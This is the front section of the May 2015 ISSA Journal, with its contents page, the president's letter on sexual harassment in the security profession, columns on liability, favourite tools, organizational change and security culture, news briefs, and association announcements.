Вы находитесь на странице: 1из 50

May 2015

Volume 13 Issue 5

Working with Indicators of Compromise

Free/Open Source Forensics Tools
Software Supply Chain Management with BOMtotal
Using a Governance Tool
Starting with YARA the Automated Way




Attack & Detection:

Hunting In-Memory Adversaries
with Rekall and

Working with
of Compromise

Table of Contents


14 Working with Indicators of Compromise
By Jason Andress ISSA Senior Member, Puget Sound Chapter
This article discusses indicators of compromise and some of the tools that might be used to work with them. Discussed
are sources of IOC data in OpenIOC format, tools used to manipulate IOC files, and the deployment of IOC files in an
environment to scan for indicators of compromise on individual hosts.

21 Free/Open Source Forensics Tools

34 Using a Governance Tool

By Richard Abbott
This article demonstrates some free and open-source (f/
oss) tools regularly used by the author for the purpose
of forensic investigations and argues that many basic
task can be accomplished without resorting to expensive
proprietary tools.

26 Wireshark
By Didier Stevens ISSA member, Belgian Chapter
This article is a quick introduction to Wireshark as a
security tool. After discussing capturing, filtering, and
analyzing traffic, we look at a couple of scenarios.

By Joel Weise ISSA Distinguished Fellow, Vancouver

The author discusses a basic security health-check
tool that an organization can use to evaluate its dataprocessing environment against ISO standard 27002.

38 Starting with YARA the Automated Way

By Jordan Berry
This article introduces readers to YARA, its
applications, and suggests additional resources that
information security professionals can use to make
YARA part of their defensive toolkit.

30 Software Supply Chain Management with

By Jonathan Knudsen
This article describes BOMtotal, a free service that
generates a bill of materials from any executable code.

Also in this Issue


From the President

Sabetts Brief


The Real Issue Is Not Booth Babes

Tool, Tool, Everywheres A Tool

Herding Cats

My Favorite Things

The Open Forum

Reimaging Information Security

Security in the News

Security Awareness

The Security Culture Framework

10 Association News
17 Ship of Tools

All the Security Tools in the World Cant Save You

25 Donns Corner

The Trusted Persons Security Threat

42 toolsmith

Attack & Detection: Hunting In-Memory

Adversaries with Rekall and WinPmem

2 ISSA Journal | May 2015

2015 Information Systems Security Association, Inc. (ISSA)

The ISSA Journal (1949-0550) is published monthly by the Information Systems
Security Association, 12100 Sunset Hills Road, Suite 130, Reston, Virginia 20190.

From the President

Hello ISSA members
Ira Winkler, International President

The Real Issue Is Not Booth Babes

t this years RSA Conference, there was a great deal of focus on making
the conference comfortable for women. There was the news of banning
Booth Babes on the expo floor. RSA president Amit Yoran made
statements during both his keynote and the Executive Womens Forum meeting that he was looking
to make the conference and industry as a whole more welcoming to women. While this is good, it is
important to look well beyond conferences and booth babes to see how the industry is really treating
women. Unfortunately, I recently witnessed this first hand.
I use the word unfortunately not to indicate how the profession as a whole treats women, but that I witnessed an individual incident of Sexual Battery and the resulting impact on the victim. While the fact
that the woman had to go through something horrible is bad, it was actually good to see how others
reacted to the incident.
When I heard the back story, it was clear that almost everyone, and especially the men who witnessed
the initial incidents a year prior, rallied around the victim to offer help. When the victim was scared
to report the incident, it was actually a man who reported the incident to the appropriate corporate
department. The company took action against the perpetrator and eventually fired him.
The victim believed that the perpetrator could ruin her career, and that reporting the incident or cooperating with the investigation would somehow brand her That woman. Clearly this is absurd, but that
is what society has trained woman to believe, despite every action to that point clearly supporting her.
Recently the perpetrator was brazen enough, as many sexual predators are, to pull the woman away
from a crowd (Battery according to the responding police officer), threaten her with retaliation, and put
his hand on her behind as a further act of intimidation (making it Sexual Battery). I saw the incident
first hand. I helped her file the police report, pull the video from the venue, and otherwise alert the
relevant authorities of the incident.
I am personally taking every action reasonable to protect the Association, our members, and the profession from the perpetrator. This is clearly a complicated issue that needs to be handled properly.
Getting rid of booth babes will not stop incidents like this from occurring. Sexual predators are present in all professionsand are luckily fewbut they do exist. And yes, there are women who make
false claims. They are likewise despicable and damaging to the profession, and even more damaging to
genuine victims. Luckily, they are as rare as the men who commit the harassment.
Anyone with minimal empathy can see the pain in a real victim. While it is despicable that anyone has
to go through this experience, it is, however, encouraging to see the reaction by others in the profession. At just about every level the woman received support from those who could help her.
I have to admit that I never previously saw the pain of a victim of extreme sexual harassment, and it
is horrible. While anything we can do to make women comfortable is welcome, it is easy to trivialize
the problem when the focus is on booth babes. Hopefully though, the recognition of booth babes as
an issue will sensitize everyone to the larger issues, and the profession and ISSA members will offer all
victims the same level of support that this woman has received, and will continue to receive.
Ira Winkler
May 2015 | ISSA Journal 3



Editor: Thom Barrie

Advertising: vendor@issa.org
866 349 5818 +1 206 388 4584

International Board Officers

Board of Directors


Frances Candy Alexander, CISSP, CISM,

Distinguished Fellow
Debbie Christofferson, CISM, CISSP, CIPP/
IT, Distinguished Fellow
Mary Ann Davidson
Distinguished Fellow
Rhonda Farrell, Fellow
Geoff Harris, CISSP, ITPC, BSc, DipEE,
CEng, CLAS, Fellow
Tim Holman, Fellow
Pete Lindstrom, CISSP
Anne M. Rogers, CISSP, Fellow
Stefano Zanero, PhD, Fellow

Ira Winkler, CISSP,

Distinguished Fellow

Vice President

Andrea C. Hoy, CISM, CISSP, MBA,

Distinguished Fellow

Secretary/Director of Operations
Bill Danigelis, CISSP,
Senior Member

Treasurer/Chief Financial Officer

Kevin D. Spease,

The Information Systems Security Association, Inc. (ISSA) is a not-for-profit, international

organization of information security professionals and practitioners. It provides educational
forums, publications and peer inte raction opportunities that enhance the knowledge, skill and
professional growth of its members.
With active participation from individuals and chapters all over the world, the ISSA is the largest international, not-for-profit association specifically for security professionals. Members
include practitioners at all levels of the security field in a broad range of industries, such as
communications, education, healthcare, manufacturing, financial, and government.
The ISSA international board consists of some of the most influential people in the security
industry. With an international communications network developed throughout the industry,
the ISSA is focused on maintaining its position as the preeminent trusted global information
security community.
The primary goal of the ISSA is to promote management practices that will ensure the confidentiality, integrity and availability of information resources. The ISSA facilitates interaction
and education to create a more successful environment for global information systems security
and for the professionals involved.

Editorial Advisory Board

Mike Ahmadi
Michael Grimaila, Fellow
John Jordan, Senior Member
Mollie Krehnke, Fellow
Joe Malec, Fellow
Donn Parker, Distinguished Fellow
Joel Weise Chairman,
Distinguished Fellow
Branden Williams,
Distinguished Fellow

Services Directory

866 349 5818 +1 206 388 4584

Chapter Relations

866 349 5818 +1 206 388 4584

Member Relations

866 349 5818 +1 206 388 4584

Executive Director

866 349 5818 +1 206 388 4584

Information Systems Security Association

12100 Sunset Hills Road, Suite 130, Reston, Virginia 20190

703-234-4082 (direct) +1 866 349 5818 (USA toll-free) +1 206 388 4584 (International)
Encourage a Cybersecurity Specialist to join ISSA today!
Send your colleagues to www.issa.org/general/register_member_type.asp?
The information and articles
in this magazine have not been
subjected to any formal testing by Information Systems
Security Association, Inc. The
implementation, use and/or selection of software, hardware,
or procedures presented within
this publication and the results
obtained from such selection or
implementation, is the responsibility of the reader.
Articles and information will be
presented as technically correct
as possible, to the best knowl4 ISSA Journal | May 2015

edge of the author and editors.

If the reader intends to make
use of any of the information
presented in this publication,
please verify and test any and
all procedures selected. Technical inaccuracies may arise from
printing errors, new developments in the industry, and/or
changes/enhancements to hardware or software components.
The opinions expressed by the
authors who contribute to the
ISSA Journal are their own and
do not necessarily reflect the

Vendor Relations

866 349 5818 +1 206 388 4584

official policy of ISSA. Articles

may be submitted by members
of ISSA. The articles should be
within the scope of information
systems security, and should be
a subject of interest to the members and based on the authors
experience. Please call or write
for more information. Upon
publication, all letters, stories,
and articles become the property of ISSA and may be distributed to, and used by, all of its
ISSA is a not-for-profit, inde-

pendent corporation and is not

owned in whole or in part by
any manufacturer of software or
hardware. All corporate information security professionals
are welcome to join ISSA. For
information on joining ISSA
and for membership rates, see
All product names and visual
representations published in
this magazine are the trademarks/registered trademarks of
their respective manufacturers.

Sabetts Brief
Tool, Tool, Everywheres A Tool
By Randy V. Sabett ISSA Senior Member, Northern Virginia Chapter

hile I was still a crypto engineer and in law school, a

lawyer friend of mine got
me up to speed on a few cases that he
said would become pivotal in discussions about infosec liability. While dealing with such mundane technology (by
todays standards) as barges or radios,
many argue that the concepts embodied
in those old cases can give guidance in
situations involving data breaches. Lets
take a look at two of them (and though
you may already be familiar with them,
its still fun to review)
The first well-known decision in U.S. v.
Carroll Towing by Judge Learned Hand
led to the equation B < P x L. The equation stands for the idea that liability allocation can be viewed as depending on
whether the burden (B) on a party to
avoid that liability is less than the probability (P) of the bad thing happening
multiplied by the losses (L) that could
occur. In an infosec setting, the equation can be used with some very rough
hypothetical numbers to show a client
where liability could attach if certain security issues are not addressed.
The second case involved the use of
good-old-fashioned two-way radios. In
a case styled as The T.J. Hooper, plaintiffs
sought compensation from the owner
of two barges that got caught in a storm
and lost the plaintiffs cargo. When it
came to the issue of the radio on board
the ship and whether it should have been
used, the judge said that although [a]
whole calling may have unduly lagged
in the adoption of new and available devices.... Courts must in the end say what
is required. There are precautions so imperative that even their universal disregard will not excuse their omission.
So now lets fast forward to May 2015.
What tools are available today that (a)

are not yet a standard but (b) could be

viewed as being technology where universal disregard will not excuse [its]
omission? Some people point to at least
three examples: ongoing employee assessments, encryption, and two-factor

comes an app on
your device). In
light of how several
of the high profile
attacks have involved authentication issues, this would be one that companies
may want to consider.

Technology and processes exist today

that will allow a company to be made
aware of activities by its employees that
may be questionable or that could indicate that the employee is engaged in
activity that could be harmful to the
company. Instead of just running a
background check on an employee before he begins work for the company, a
continual background check could instead be run. These types of tools stand
as an excellent mechanism for cutting
down on the insider threat.

One last thing to consider: DHS recently announced that it had certified the
first two pure cybersecurity commercial
products under the SAFETY Act. This
means that companies that utilize such
products will have certain automatic
limitations on their liability in the event
of a terrorist event. More such certifications will likely happen in the future.
This is a slightly different take on what
we talked about aboveinstead of incurring liability for not using a tool, now
you have a shield against at least some
liability by using certain certified products. So now get out there and figure out
what tools make sense for you while I go
and tie up my barge!

Encryption technology has come a long

way since the first commercial products
appeared over 10 years ago. Concerns
over performance/throughput, recoverability, or ease of use have gone by the
wayside. Full disk encryption is built
into certain operating systems. Certain
free versions are available. The process
has become so transparent and fast, it is
hard (if not impossible) to tell the difference between an unencrypted computer
versus one with full disk encryption. I
just recently was on a call with a client
and a security vendor, and the vendor
told the client there is no reason [today]
to not have full disk encryption on all
your computers.
Lastly, two factor authentication has also
become incredibly easier to provision
and use. Where security requirements
will allow it, many two-factor approaches now exist that can turn your existing
smart phone into the second factor, doing away with the need for a dedicated
piece of hardware (i.e., it merely be-

About the Author

Randy V. Sabett, J.D., CISSP, is Special

Counsel at Cooley LLP (www.cooley.
com), and a member of the Boards of
Directors of ISSA NOVA and the Georgetown Cybersecurity Law Institute. He
was a member of the Commission on Cybersecurity for the 44th Presidency, was
named the ISSA Professional of the Year
for 2013, and can be reached at rsabett@
cooley.com The views expressed herein
are those of the author and do not necessarily reflect the positions of any current
or former clients of Cooley or Mr. Sabett.

May 2015 | ISSA Journal 5

Herding Cats
My Favorite Things
By Branden R. Williams ISSA Distinguished Fellow, North Texas Chapter

ome of you
may not realize, but Im
truly a techie at
heart (and a Trekkie too). Technology
was always easy for me. My parents tell
stories of how I took over the nurses
computer station in 1982 at the hospital
when my sister was born. I was not quite
four years old. I have no memory of this,
but I embrace it today just as much as I
did back then. My family was an Apple
family from the get-go. My first real Internet account was a Netcom shell dialup account. Unix variants were the first
real operating systems I learned inside
and out. I did spend time swearing at
Windows 95, 98, NT4, and XP (for about
a decade) like the rest of you, but eventually switched back. I feel at home in the
Unix world, and OSX does a good job of
keeping me grounded there.

tool. Ive used grep, perl, sed, and awk

as command line Swiss Army knives to
automate lots of data processing. Sometimes it was taking megabyte NMap
scan results and parsing out targets on
a specific port, while other times I was
pre-populating database tables with default values. Anyone who has done any
testing at all has dealt with massive text
files filled with data. If you do not know
grep or the other tools I mentioned, you
should definitely spend time learning

There are a few tools that I have come to

rely on and love. Being that I grew up in
the Unix world, I loved tinkering with
various kinds of scripts to automate certain tasks, such as basic automation and
security testing. The first article I ever
published was in the December 1998
issue of Linux Journal where I detailed
a set of scripts I wrote to automate user
management.1 I spent quite a bit of time
playing with virtually every type of
scripting you could do in various kinds
of shellsincluding tcsh for some backwards reason. I suppose I just wanted a

NMap, the port mapper of record. This

tool has been around for so long, but is
such a great tool for building profiles on
targets as well as doing network diagnostics. Ive used it to figure out the dynamic IP of a server when I didnt have
access to DHCP logs, reverse engineer a
firewall ruleset (from either side), or to
fingerprint devices (something that has
gotten quite good over time).

Today, I have a few go-to tools that I

cant live without. Many of these tools
have Windows variants, so you may
need to find an appropriate port.
Grep (Globally search a Regular Expression and Print), my go-to finding
1 You can see this gem, with an unbearded picture here:

6 ISSA Journal | May 2015

I would be remiss if
I didnt mention the
biggest and best tool of
all, your brain.

Wireshark, packet slicer and dicer extraordinaire! Of course, I used it when it

was called Ethereal and mispronounced
its name as much as anyone else did. I
would be remiss if I didnt include tcpdump in this category too for the times
when you just need to inspect parts of
packet traffic but dont need the full payload inspection. This tool is a must have
for understanding how applications interact on the network.
Little Snitch, my personal firewall for
OSX. This little tool will snitch on any

service that is trying to use the network.

You can set some baseline rules (like
always allowing your browser to access
ports 443 and 80), and then let it alert
when a website is trying to load something over a Shockwave port. You will
learn a lot about OSXs chatty nature
and learn how to add some additional
service security. Its a bit noisy when you
first get it running, but worth the time
Google, the great technology oracle in
the tubes (apologies to Oracle). I am constantly surprised by the great nuggets
this little PhD research project displays
when you ask it the right questions. Not
only is it great for recon on your targets
(or understanding how much your organization leaks), but I often joke that it
is a free development resource as I have
found lots of help with little pet projects
over the years.
Finally, I would be remiss if I didnt
mention the biggest and best tool of all,
your brain. Be skeptical of claims. Limit
your trust, or at least question why you
choose to trust a person, machine, or
service. Machines are getting better at
this, but they still have a long way to go
to catch up!

About the Author

Branden R. Williams, DBA, CISSP,

CISM, is the CTO, Cyber Security Solutions at First Data, a seasoned security
executive, and regularly assists top global
firms with their information security and
technology initiatives. Read his blog, buy
his book, or reach him directly at http://

The Open Forum

The Open Forum is a vehicle for individuals to provide opinions or commentaries on infosec ideas, technologies, strategies, legislation, standards, and other topics of interest to
the ISSA community. Open Forum articles are not intended for reporting news; they must provide insight, opinion, or commentary to initiate a dialog as to be expected from an
editorial. The views expressed in this column are the authors and do not reflect the position of the ISSA, the ISSA Journal, or the Editorial Advisory Board.

Reimaging Information Security

By Frederick Scholl ISSA Senior Member, Middle Tennessee Chapter and Chuck Capps

he past couple of years have not

been a happy time for many security professionals. Despite everyones best efforts, security breaches
continue to make headlines. To improve
things, new technologies have been proposed, new services offered, and more
research started. We think the answer
to better information security is readily available; we just need to put it into
Security gurus from Bruce Schneier to
John McAfee have long pointed out that
people and training are the weakest
links in security defense. So what did
the industry do about it? We adopted
a security awareness control for our
users. Furthermore, while we readily acknowledge human effort is our weakest
link, we continue to emphasize technical solutions. The fact is our adversaries
have the same technologies and information as we do.
Our suggestion is to add organizational
change (OC) models to the security toolkit. The following recommendations are
proven, powerful actions. Its not a question of replacing something we are doing; instead, we must reimage what we
have been doing.
Organizational change agentsthis is
youtypically overlay change models
on work environments under consideration. The OC literature shows several
models that have demonstrated empirical successes in related areas like industrial safety and quality control. So how/
what can CISOs and information security directors borrow from the management discipline?
First, develop a comprehensive enterprise plan prior to initiating any security transformation programany
program. Kotters1 approach lists eight
1 John Kotter, Leading Change, Harvard Business
Review Press (2012).

steps to success, starting with establishing a sense of urgency. The enterprise

plan should reveal industry standards,
your companys performance against
these standards, and articulate the getwell plan. Urgency is obvious when
your company hears warning bells. The
STAR Model 2 addresses the companys biggest needs and insists five
elements must be in alignment: strategy, structure, processes, rewards, and
people. Right now, we challenge you to
design these elements into a comprehensive plan that emphasizes: 1) the reason
for the changethe driving stimulus,
2) step-by-step procedures everybody
must use, 3) who is in charge of the
changes and who are the go-to people
throughout the company to assist with
the changes, and 4) the end targethow
will the leaders and the company know
if the objective was accomplished?

Publish security program transformation results in either raw data or graphical format. Select those who are succeeding and report their numbers. Ask the
CEO/manager to publicly acknowledge
the employees and work sections that
are succeeding in the change process.
This action alone shows she is paying
attention and rewarding those who are
engaged in the organizational initiative.

The second lesson learned from OC

practitioners is to ensure everybody
knows the boss is driving this transformation and that she expects everyone
to cooperate. Whether it is the CIO of
a 30-person firm in Peoria, IL, or the
SVP/CISO of a global Fortune 100 firm,
OC strategy requires that the change
agent be perfectly in sync with the CEO/
general manager. Information security
changes cannot be implemented effectively without the powerful stamp of the
companys leader.

Its time to reimage information security; we are the ones who can make this

The final lesson learned from the OC experience is the need to include appropriate metrics throughout the change process. Metrics are already the bread and
butter of security professionals. However, to lead to change, these metrics
must be transparent to the organization.
While transparency is not often part of
enterprise security programs, it can be a
critical determinant for success.
2 Jay Galbraith, Designing Organizations, Pfeiffer (2002).

Once you are doneyou are not done.

Any successful change will need a maintenance process to make sure the change
is permanent. This is Kotters step number eight: anchoring the change in the
culture. In his model, cultural change
is the last step, not the first step sought
after by many security professionals (
if only our users were more careful).
In our field, as security threats change,
the organization will need to change the

About the Authors

Dr. Frederick Scholl,

CISSP, is Interim Director of Graduate Programs, College of Computing and Technology,
in Nashville, TN. Fred
may be reached at fred.scholl@lipscomb.
Dr. Chuck Capps is
an Associate Professor of Management at
Lipscomb University.
He served 21 years in
the USAF, facilitating
organizational assessment and change activities.He may be reached at chuck.capps@
May 2015 | ISSA Journal 7

Security in the News

News That You Can Use

Compiled by Joel Weise ISSA Journal Editorial Board Chairman, ISSA Distinguished Fellow, Vancouver, Canada Chapter
and Kris Tanaka ISSA member, Portland Chapter

Cybersecurity at RSA: All about the Tools, No Trouble?

RSA Conference 2015 THE place to see the latest and greatest tools and technological advances the information
security world has to offer. However, keep in mind that while tools are an important part of an organizations
security strategy, they are only as good as the professionals who wield them. Its all about the tools AND the
cyber warriorsno trouble!

DDOS Attack Targets Popular Anti-Censorship Projects on Github

It was the largest DDoS attack in the sites history, evolving several times to circumvent GitHubs defenses. It
still isnt clear who was behind the attack. However, since the attack was aimed at two popular projects that
help Chinese citizens get around restrictive government online censors, the Great Firewall of China and CN-NY
Times, one can assume that the instigators were pro-censorship. It appears that protests have moved from the
streets into cyberspace.

Europol Chief Warns on Computer Encryption

Its all about balance. Yes, we need to make sure that law enforcement has access to online data in order to
fight terrorism and cybercrimes. However, should police and other officials have access to all available electronic
information and communication? Encryption does make it more difficult to monitor suspects. But encryption also
gives us privacy and keeps our data safe. At least it does in theory.

Saanich Mayor Vindicated by Privacy Commissioners Report on Spyware

Spyware in Canada? Say it aint so! For those of us in Canada, where we do take privacy very, very seriously, it
is almost a shock to hear that a local government would illegally install spyware on municipal computers. The
scary part is, The software was also too invasive, tracking not only Atwells Internet and email usage, but also
recording all the keystrokes he made and taking screenshots of his screen every 30 seconds.

New Executive Order: Obama Takes Total Control of Internet Declares National Cybersecurity Emergency
Its hard to say how this will play out, but the US government appears to be taking cyber threats and cybersecurity very seriously. The executive order allows the US government to levy economic sanctions against individuals
overseas who engage in destructive cyberattacks or commercial espionage. The concern here is who defines what a
cyberattack is? Will my use of whitehat security forensic tools be deemed a form of cyberattack?

Hacking ATMs, Literally

Most information security practitioners, myself included, dont often consider physical threats. Heres a great
example of physical security in action. It seems to me, only a novice criminal would try to attack an ATM. The
vaults within them are usually very strong and lets face it, stealing money electronically is easier and I would
guess more profitable.

Florida Teen Charged with Felony Hacking for Using Password His Teacher Showed Him

In my opinion, this is a case of police over-reach. On its face, this sounds like a simple prank by a typical
14-year-old juvenile. Im hard pressed to understand why police would expend their energies on what I would call
a trivial threat. It would be interesting to hear from readers what their take is on this incident.

Chinas Great Cannon

Im sure almost all security practitioners are aware of the Great Firewall of China. Now we have to deal with
Chinas Great Cannon, which according to this article deploys DDoS attacks. As the authors state, the operational deployment of the Great Cannon represents a significant escalation in state-level information control:
the normalization of widespread use of an attack tool to enforce censorship by weaponizing users. I wouldnt
call this an escalation in cyberattacks, but rather a better awareness of the tools that the Chinese are using.

New Security Flaw Spans All Versions of Windows

Well this doesnt sound too good for Microsoft users. A newly discovered vulnerability called Re-Direct to SMB
has been found that can potentially enable an adversary to determine different user credentials. The attack does
appear viable although not trivially easy. And not to pick on only Microsoft, it seems iTunes is also vulnerable.
8 ISSA Journal | May 2015

Security Awareness
The Security Culture Framework
By Geordie Stewart ISSA member, UK Chapter

ong suffering readers of this column will be familiar with the

importance of security culture in
driving behavioral change. This month
I caught up with Kai Roer, founder of
the Roer Group and author of Build a
Security Culture. Kai has created a free
resource called the Security Culture
Framework and runs a blog at Roer.com.
What is security culture?
Security culture is security awareness
that actually works. Culture can be
defined as the ideas, thoughts, and behaviors of a particular group or people;
meaning it is the rulesvisible and
hiddenthat form and inform the
groups members way of thinking
and being. Security culture is a subset of culture, the part of culture
that works on securityboth positive and negative. For example, a
negative security culture is seen in
organizations where people do not
follow policies (or they do not exist), or training efforts do not teach
members what is the right behavior.
A positive security culture is one where
each member is helping each other to
do the right thinglike explaining to
the newcomer that We always carry
our badges visibly, and by openly informing the rules, regulations, and expectations. Culture in general comes
with a high expectation of conformabilityand it seems that humans are
hard-wired to conform to the norms in
a culture almost automatically. Most of
the times, we dont even know that we
do; we just do what is expected from us.
Understanding how these strong currents impact our group or organization
and how we can work to change the
culture to create the currents we need
makes culture an important security
controlone that either works against
you or with you to form security culture.

Do you think security professionals

understand security culture?
The answer depends on your definition of a security professional. Security
professionals comes of all sortsfrom
cybersecurity malware researchers
to QHSE-professionalsfrom operative support personnel to military tacteams. So on a general note, I would say
yes, security professionals understand
security culture. That is not the same as
understanding how to build and maintain security culturesomething very
few security professionals do. It is also
important to understand that some of

these groups know more about security

culture than other groups. I think it is
a safe claim to make that some cybersecurity professionals fail to understand
what security culture is. The more interesting question, in my opinion, is
should we expect cybersecurity professionals to know about and build security
I often hear that security awareness is a
responsibility that lies within the cybersecurity group, and as such it must be
the same group who should train, build,
and maintain security culture. I question that assumption. I believe that the
security content and competence needs
to come from the cybersecurity group,
but that is not the same as making that
technical team in charge of building and
maintaining security culture. In fact, I

suggest using resources from HR

and marketing, and
project managers
from the project office, when it comes
to building and maintaining security
And, of course, my claim that most security professionals understand security
culture is not saying that they are able
to define it, nor point at it. That is one
of the areas we are helping with through
the Security Culture Framework.It is a
free and open framework to build and
maintain security culture in organizations. I created this framework
some years ago and decided to give
it away in order to help more organizations worldwide and to build a
community of like-minded professionals to meet and discuss security
Where can people find out more
about the framework?
The framework is available at scf.
roer.comwhere you can download
templates, join the community, and
share your experience. We also have a
monthly Google hangout where we talk
security culture with fantastic security
awareness specialists such as Rebecca
Herold and Lance Spitzner. This year
were also doing the first Security Culture Conference where people from
around the world can meet, learn, and
discuss security culture.

About the Author

Geordie Stewart, MSc, CISSP, is the

Principle Security Consultant at Risk
Intelligence and is a regular speaker and
writer on the topic of security awareness.
His blog is available at www.risk-intelligence.co.uk/blog, and he may be reached
at geordie@risk-intelligence.co.uk.
May 2015 | ISSA Journal 9

Association News
ISSA Pre-Professional Virtual Meet-Up
Call for Nominations Now Open

SSA annually recognizes outstanding information security professionals, their companies, and chapters that are
at the top of their respective games. Who would you like
to see recognized? Nominations may be made by any member in good standing; please thoroughly review theAwards
Policies and Procedures. This years awards will be presented
at theISSA International Conferencein Chicago, Oct. 12-13.
All nominations and supporting documents must be receivedby May 15, 2015, at 11:59 p.m. Eastern time.
Hall of Fame: Pays homage to an individuals exceptional
qualities of leadership in his or her own career and organization as well as an exemplary commitment to the information
security profession. (ISSA membership not required.)
Honor Roll:Recognizes an individuals sustained contributions to the information security community, enhancement
of the professionalism of ISSA members, and advancementof
the association.
Security Professional of the Year:Honors the member who
best exemplifies the most outstanding standards and achievement in information security in the preceding year.
Volunteer of the Year:Recognizes a member who has made a
significant difference to his or her chapter, the association, or
the information security community through dedicated and
selfless service to ISSA.
Chapters of the Year: Rewards chapters that have done
anexceptional job of supporting ISSAs mission, serving their
member communities, and advancing the field.
Three awards will be given based on size: less than 100
members, 100-200 members, more than 200 members.

o, you think you want to work in cybersecurity? Not

sure which way to go? Not sure if youre doing all you
need to do to be successful?

Penetration Testing - Fireside Chat with Chris Simpson

May 14, 2015 6:30 pm Eastern/3:30pm Pacific

To help our members who are in the Pre-Professional and

Entry levels of their career, we are introducing a new service
to help you sort through what might seem like a maze. ISSA is
hosting Virtual Meet-ups to provide you with an opportunity
to ask questions of our guests on how they got started and
what they did to get the skills/knowledge necessary to move
their careers forward.
Working as a Penetration Tester is one of the most exciting
areas of information security. In addition to strong technical
skills, a good pentester must understand complex legal requirements, be able to analyze large amounts of data, be able
to explain complex technical topics to non-technical management, and be a good team member. In this fireside chat
our panel will discuss the technical and non-technical skills
required of a pentester. They will provide information on how
to become a pentester and share their lessons from the field.
Moderator: Candy Alexander: ISSA Cybersecurity Career
Lifecyle co-chair and International director, GRC security
consultant/virtual CISO, Towerwall Inc.
Speaker: Chris Simpson: Owner, Bright Moon Security
Click here to access the Google Hangout and add the event to
your Google calendar. The event will also be streamed live and
archived on ISSA's YouTube Channel. Click here for more information on the ISSA Cybersecurity Career Lifecycle program.

ISSA Volunteers Prepare for the Masses

Chapters of the Year will each receive $500 toward

a member-appreciation event or a donation in the
chapters name to a scholarship fund of the winners
Organization of the Year: Acknowledges an organizationthat has provided a sustained, proactive presence that directlycontributed to the overall good and professionalism of
the association and its membership, providing services,products, and/or direct support that ensures the promotionof the
highest ethical standards in addressing informationsecurity
and its future direction
Presidents Award for Public Service:Honors an individualscontribution to the information security professionin the
area of public service. (ISSA membership notrequired.)
Click here for more information or to submit your nominations.
10 ISSA Journal | May 2015

Pat Myers, Joan Rose, and Tim Hoffman are shown preparing for the thousands
of conference goers at the ISSA booth during the RSA Conference, April 2024, San Francisco. More than 700 members and prospective members visited
the booth, and ISSA received more than 100 new membership applications
throughout the conference, including at least one new CISO Executive.

SAVE $200
Register with
priority code

Gartner Security &

Risk Management
Summit 2015
June 8 11 | National Harbor, MD | gartner.com/us/securityrisk

Re-evaluate your security and risk strategies

Discover five role-based programs targeted to your
security and risk needs
Chief Information Security Officer (CISO) Program
IT Security Program
Business Continuity Management (BCM) Program
Risk Management and Compliance Program
Business of IT Security Program

2015 Gartner, Inc. and/or its affiliates. All rights reserved. Gartner
is a registered trademark of Gartner, Inc. or its affiliates. For more
information, email info@gartner.com or visit gartner.com.

Association News
Cybersecurity Coalition Aims at Shortage of One Million
Infosec Professionals
San Francisco, CA April 22, 2015

n a first-of-its-kind initiative, the Information Systems

Security Association (ISSA) exercised its industry neutrality to invite more than a dozen leading organizations
in the field of cybersecurity to convene April 20th in San
Francisco at RSA Conference 2015. The immediate purpose
was to begin work toward establishing a universal framework
for resolving the shortfall of qualified people in the cybersecurity profession.
Some contributing factors to this shortfall that were initially
identified as a group are the following:
The disconnect between what business asks for versus
what it actually needs in regards to skills and staffing

meeting was important because it brought together leading

organizationsfor-profit and non-profit, educational, professional, certifying bodies, and government to discuss how to
jointly address this pressing global need. A broad, inclusive
view is the best way to build a road map that we can all support, so this is an important first step, said executive director
for Purdue University, CERIAS, Professor Gene Spafford.
ISSA saw this coming several years ago and in response began developing the new Cybersecurity Career Lifecycle program, said chief architect of ISSAs Cybersecurity Career
Lifecycle (CSCL) program, Candy Alexander. Even still, this
gap in demand of nearly 1 million professionals must be addressed by the industry as a whole, she added.

Recognizing the US versus global differences in job

definitions and staffing

We are pleased that so many have recognized the benefit of

working together to address this serious and import challenge
for the profession. We now look forward to the next meeting
and next steps, ISSA executive director Dick Blatt said. We
intend to deliver tangible progress.

The need for all groups within the profession to collaborate to define the profession

ISSA is the community of choice for 11,000 cybersecurity

professionals in 150 chapters and nearly 70 countries globally.

The need for common definition of job descriptions

and job responsibilities

Among the groups attending were the (ISC)2, Center for Internet Security, US Cyber Challenge, Colloquium for Information Systems Security Education, CompTIA, National Cybersecurity InstituteExcelsior College, Global Information
Assurance Certification, Institute of Electrical and Electronics Engineers (IEEE), ISACA, ISSA Education Foundation,
National Cybersecurity Institute, Purdue UniversityCenter
for Education and Research in Information Assurance and
Security (CERIAS), and the SANS Institute.
With more than 400,000 members in 160 countries, IEEE
and its members are major stakeholders in this issue, said
chair of the IEEE Cybersecurity Initiative, Dr. Greg Shannon.
We are all facing the same challenges in efficiently creating a
cybersecurity-capable workforce. The more we collaborate as
a community, the more efficiently we can create broad solutions, the better we can thwart cyber threats.
The international cybersecurity community is looking for
solutions to pressing cybersecurity issues. Its important that
we listen to all voices in the industry from certifications to
professional organizations and education. The importance of
public-private partnerships would serve everyone greatly in
order to attain a new level of cooperation to help define the
profession, said former cybersecurity advisor for both President Bush and President Obama, Howard Schmidt.
Over the last few decades, many groups have attempted to
define the profession, resulting in curricula, certification
standards, and lists of skills that only partially intersect. This
12 ISSA Journal | May 2015

2015 On-Demand Industry Webinar

Exposing Risky IT Security:

Best Practices from the Testing

Enterprises are racing to shore up on-premise and cloud

defenses to avoid being the next security headline.
Spending on security technologies is at an all-time high,
but how confident are you in vendor decisions and security architecture you are implementing? High-fidelity
testing can replace guesswork-bassed uncertainly with
fact-based confidence.
Join this webinar and learn from top security professionals the best practices for data-driven security decisions
that ensure secure and resilient networks.
You will learn:
Strategies to make data-driven technology investments
Importance of realism and scale in application
and network staging labs
Special considerations to test and assess cloud
Register nowto reserve your spot!
Presented by

Association News
CISO Executive Forum Update

he ISSA CISO Executive ForumApril 18-19, 2015,

The Argonaut Hotel, San Franciscowas a great success with more than 100 CISOs who registered to hear
industry luminaries such as Brian Grayek, CISO, Verizon;
Elvis Chan, supervisory special agent, FBI, San Francisco;
Alex Doll, founder and managing general partner, Ten Eleven Ventures; Rick Gordon, managing partner, Mach37 Cyber
Accelerator; Rama Sekhar, principal, Norwest Venture Partners; John Stewart, senior vice president and chief security
officer, Cisco Systems; Brett Wahlin, vice president and chief
information security officer, Hewlett-Packard; and David Estlick, information security chief, Starbucks.
Presenters effectively addressed the topical issues based
on this forums theme: New Strategy and Technology Approaches for the CISO. Thanks to all the speakers for their
top-notch presentations. Special thanks to David Estlick, who
preceded his presentation with an eye-opening, tongue-tantalizing lesson on the fine art of coffee-tasting using Starbucks coffee and lemon cake.
To access some of the slide presentations, click here. More
presentations will be added as received from speakers.
